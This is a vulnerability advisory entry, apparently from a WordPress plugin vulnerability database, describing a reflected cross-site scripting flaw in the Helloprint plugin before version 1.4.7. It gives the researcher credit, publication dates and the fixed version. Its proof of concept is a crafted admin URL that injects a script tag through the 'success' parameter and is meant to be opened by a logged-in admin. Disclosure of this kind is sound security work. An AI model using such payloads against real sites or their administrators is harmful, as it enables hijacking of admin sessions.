WordPress Plugin Vulnerabilities

Helloprint < 1.4.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

Make a logged in admin open the following URL: https://example.com/wp-admin/admin.php?page=language-translate.php&success=added"><script>alert(`XSS`)</script>

Affects Plugins

Fixed in 1.4.7

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
roguethread
Submitter
roguethread
Verified
Yes

Timeline

Publicly Published
2022-11-15 (about 1 years ago)
Added
2022-11-15 (about 1 years ago)
Last Updated
2022-11-25 (about 1 years ago)

Other